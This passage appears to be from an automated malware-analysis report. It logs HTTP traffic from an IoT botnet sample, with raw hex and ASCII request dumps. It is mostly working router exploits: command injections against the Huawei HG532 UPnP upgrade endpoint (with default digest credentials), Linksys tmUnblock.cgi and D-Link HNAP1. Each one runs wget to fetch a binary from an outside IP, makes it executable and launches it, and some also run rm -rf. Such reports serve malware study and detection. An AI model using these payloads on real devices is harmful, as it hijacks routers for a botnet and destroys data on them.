2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 